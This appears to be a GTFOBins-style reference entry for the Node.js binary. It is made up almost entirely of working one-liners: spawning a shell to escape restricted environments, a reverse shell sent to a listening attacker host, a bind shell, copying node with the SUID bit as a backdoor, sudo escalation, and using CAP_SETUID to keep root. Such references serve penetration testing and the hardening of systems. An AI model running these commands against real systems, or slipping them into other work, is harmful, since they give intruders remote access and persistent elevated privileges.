It can be used to break out from restricted environments by spawning an interactive system shell.
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'It can send back a reverse shell to a listening attacker to open a remote network access.
Run nc -l -p 12345 on the attacker box to receive the shell.
export RHOST=attacker.com
export RPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh");
net.connect(process.env.RPORT, process.env.RHOST, function () {
this.pipe(sh.stdin);
sh.stdout.pipe(this);
sh.stderr.pipe(this);
});'It can bind a shell to a local port to allow remote network access.
Run nc target.com 12345 on the attacker box to connect to the shell.
export LPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").createServer(function (client) {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
}).listen(process.env.LPORT);'It runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run sh -p, omit the -p argument on systems
like Debian that allow the default sh shell to run with SUID privileges.
sudo sh -c 'cp $(which node) .; chmod +s ./node'
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'It runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo.
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'It can manipulate its process UID and can be used on Linux as a backdoor to maintain
elevated privileges with the CAP_SETUID capability set. This also works when executed
by another binary with the capability set.
cp $(which node) .
sudo setcap cap_setuid+ep node
./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'